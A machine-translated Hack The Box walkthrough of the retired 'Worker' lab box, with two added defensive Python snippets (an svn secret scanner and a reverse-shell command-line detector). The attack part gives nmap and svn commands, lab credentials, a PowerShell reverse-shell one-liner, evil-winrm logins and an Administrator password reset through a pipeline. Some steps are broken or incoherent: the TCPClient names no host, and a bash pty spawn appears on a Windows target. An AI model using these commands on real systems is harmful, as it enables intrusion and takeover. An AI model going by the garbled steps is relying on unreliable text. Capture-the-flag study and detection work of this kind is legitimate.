Shulou (Shulou.com), 05/31 report. Updated 2025-01-18.
How to use HTB for Worker penetration testing: many newcomers are not clear about this, so the following explains it in detail for anyone who needs it.
Basic information
Introduction: Hack The Box is an online penetration testing platform. It can help you improve your penetration testing and black box testing skills. The platform simulates real environments, which helps you adapt to penetration testing in a real environment.
Description:
Note: because this is a retired target machine, the current IP address is not the same as the one on the information card.
Preface
This walkthrough uses Kali and follows the usual penetration testing process: it obtains the website's version information and a user account through svn, uploads a Trojan file through the management interface to get a shell, and finally obtains root permissions by creating a pipeline that changes the administrator password.
I. Information collection
1. Target IP
The IP address is 10.129.2.29
2. Target machine ports and services
nmap -sV -A -O 10.129.2.29
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
3690/tcp open svnserve Subversion
3. Website information collection
Browsing to port 80 yields no useful information.
Use dirsearch to scan the directories; this returns some information that is not needed at present.
Use svn to view earlier versions of the deployed websites
svn checkout svn://10.129.2.29
svn diff -r 2
Got a user and the latest website name
User: nathen
Password: wendel98
Website: http://devops.worker.htb
Add the address to the hosts file and access the site again
Enter the obtained username and password on the page
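The credentials above came out of an earlier revision: removing a secret in a later commit leaves it readable in the repository history. As an added example (not part of the original walkthrough), this Python check scans svn diff output for quoted literals assigned to credential-like names; the sample diff, file name, values and name patterns are constructed assumptions.

```python
import re

# Constructed sample shaped like `svn diff -r 2` output; file name and values are made up.
SAMPLE_DIFF = """\
Index: deploy.ps1
===================================================================
--- deploy.ps1  (revision 2)
+++ deploy.ps1  (working copy)
@@ -1,5 +1,4 @@
-$user = "svc_example"
-$plain = "ExamplePassw0rd"
+# credentials moved out of the script
 $target = "http://build.example.test"
-$cred = New-Object System.Management.Automation.PSCredential($user, $plain)
+$cred = Get-Credential
"""

# A credential-like name assigned a quoted literal of at least 4 characters.
ASSIGN = re.compile(r"""(?ix)
    \$?(?P<key>\w*(?:pass(?:word|wd)?|plain|secret|token|user(?:name)?)\w*)
    \s*[:=]\s*(?P<q>["'])(?P<val>[^"']{4,})(?P=q)""")


def scan_svn_diff(diff_text):
    """Return (file, sign, key, masked_value) for changed lines holding literals.

    '-' findings matter as much as '+': a secret deleted in a later commit is
    still readable in the earlier revision and has to be rotated.
    """
    findings, current = [], None
    for line in diff_text.splitlines():
        if line.startswith("Index: "):
            current = line[len("Index: "):].strip()
        elif line.startswith(("--- ", "+++ ")) or line[:1] not in ("+", "-"):
            continue  # file headers, hunk headers and unchanged context
        else:
            m = ASSIGN.search(line[1:])
            if m:
                masked = m["val"][:2] + "*" * (len(m["val"]) - 2)
                findings.append((current, line[0], m["key"], masked))
    return findings


if __name__ == "__main__":
    for finding in scan_svn_diff(SAMPLE_DIFF):
        print(finding)
```

Values are masked in the result so the report itself does not become another copy of the secret.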
II. Vulnerability detection and exploitation
After some investigation, we find that this account has permission to publish content that other users can then use. We can use this permission to upload a Trojan file and get a shell.
Do the following:
Establish a new branch
Enter the newly created branch
Upload Trojan files
After that, it's the same as my operation.
After the operation is completed, run the command that triggers the reverse shell. This step should be done quickly; if the operation is too slow, the connection will fail.
The reverse shell command is as follows
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient; $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS' + (pwd).Path + '>'; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush()}; $client.Close()"
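From the defending side, the one-liner above has a recognisable shape in process command-line telemetry: a raw TCP client, its stream, and received text passed to iex. The following Python scoring check is an added example, not part of the original walkthrough; the indicator names, weights, threshold and sample records are constructed assumptions.

```python
import re

# Traits of the one-liner above: raw TCP client, its stream, and received text fed
# to Invoke-Expression. Names, weights and threshold are illustrative assumptions.
INDICATORS = {
    "tcp_client": (re.compile(r"net\.sockets\.tcpclient"), 3),
    "get_stream": (re.compile(r"\.getstream\("), 2),
    "invoke_expr": (re.compile(r"\b(?:iex|invoke-expression)\b"), 3),
    "no_profile": (re.compile(r"(?:^|\s)-nop(?:rofile)?\b"), 1),
    "ascii_decode": (re.compile(r"asciiencoding|encoding\]::ascii"), 1),
}
THRESHOLD = 6  # a socket trait plus an execution trait, never one trait alone

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WEB01", r'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient; '
              r'$stream = $client.GetStream (); ... iex $data 2 > & 1 | Out-String ..."'),
    ("WEB01", r"powershell -NoProfile -File C:\Scripts\backup.ps1"),
    ("OPS02", r"powershell -c (New-Object System.Net.Sockets.TCPClient)"
              r".Connect('db01.example.test', 1433)"),
]


def normalize(cmdline):
    """Lower-case, drop backtick escapes and whitespace around punctuation, so
    `GetStream ()` and `GetStream()` compare equal."""
    text = cmdline.lower().replace("`", "")
    text = re.sub(r"\s*([().\[\]:,;=|])\s*", r"\1", text)
    return re.sub(r"\s+", " ", text)


def score_cmdline(cmdline):
    """Return (score, matched indicator names) for one command line."""
    text = normalize(cmdline)
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits


def triage(events):
    """Return (host, score, hits) for every record at or above THRESHOLD."""
    scored = [(host, *score_cmdline(cmd)) for host, cmd in events]
    return [row for row in scored if row[1] >= THRESHOLD]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The third record shows why a single trait is not enough: a plain TCP connectivity test uses the same class and scores below the threshold.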
III. Privilege escalation
1. Obtain user.txt
Get an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
Find the password file in the \svnrepos\www\conf directory
After enumerating, we get the available account number and password.
User: robisl
Password: wolves11
Use evil-winrm to log in
Link: https://github.com/Hackplayers/evil-winrm
Log in to get the user.txt successfully
2. Escalate privileges to obtain root.txt
Next, log in to the administration interface as robisl and update the administrator password by creating a new pipeline.
Only part of it is retained.
Run after setting up
Use evil-winrm to log in and get root permission
ruby evil-winrm.rb -i 10.129.2.29 -u Administrator -p HTBworkerDone!
After obtaining the website version information and the user and entering the management interface, I spent a long time there because I did not know what the pages and roles did. The reverse shell step in the middle must be carried out smoothly and quickly, otherwise it will fail. Understanding and using unfamiliar systems is something that still needs improvement.